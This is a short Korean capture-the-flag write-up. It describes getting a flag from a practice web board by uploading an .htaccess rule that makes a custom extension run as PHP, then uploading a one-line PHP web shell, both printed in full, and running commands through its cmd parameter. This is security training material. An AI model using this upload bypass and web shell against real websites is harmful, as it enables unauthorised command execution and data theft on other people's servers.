⛳Get Flag File 1

DATE : 2024/2/18

Step_1) 로그인 후 게시판 페이지로 이동

Step_2) 파일 업로드를 위해 글쓰기 페이지로 이동

Step_3) .htaccess file 업로드

AddType application/x-httpd-php .hanhxx

파일 확장자 때문에 이미지 파일을 선택한 후, 업로드 버튼 클릭 시 packet을 잡아 수정해야 한다.

Step_4) file 경로 확인하기

파일을 업로드 한 게시물로 들어가 Download 버튼에 마우스를 올리면 하단에 URL이 뜨는 걸 볼 수 있다.

이때 download.php에 filePath parameter를 전달하고 있는데 확인해보니

/download_1/hanhxx directory는 존재하지 않았다.

사용할 만한 단어를 넣어보다 보니 files directory를 찾을 수 있었다.

Step_5) web shell 업로드

<?php system($_GET['cmd']);?>

앞서 php로 처리되도록 설정 파일에 작성한 확장자로 php code를 작성해 파일을 업로드한다.

Step_6) web shell file 경로 확인

Step_7) cmd parameter로 명령어 전달

현재 파일이 업로드 된 directory를 기준으로 두 번 상위 directory로 이동 후,

해당 directory 안에 들어있는 데이터를 모두 출력해보았다.

Step_8) flag 확인

상위 directory에 들어있는 directory & file을 뒤적이다 보면 index.php에 숨어있는 flag를 찾아볼 수 있다.